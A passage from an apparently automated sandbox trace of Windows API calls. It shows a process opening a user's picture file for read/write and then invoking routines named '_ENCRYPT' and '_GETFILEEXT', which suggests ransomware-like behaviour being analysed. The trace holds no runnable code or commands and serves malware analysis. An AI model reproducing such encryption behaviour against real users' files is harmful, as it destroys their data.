(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0040.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", lpUsedDefaultChar=0x0) returned 70 [0040.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.329] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\t4n1ioav.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=70, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0040.329] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8c) returned 0x7c38b0 [0040.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=70, lpWideCharStr=0x7c38b0, cchWideChar=70 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg") returned 70 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.331] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.331] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.333] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.333] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.334] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.335] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0040.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.335] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.335] CloseHandle (hObject=0x128) returned 1 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.335] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.336] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.336] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.336] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.336] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.336] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.336] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, 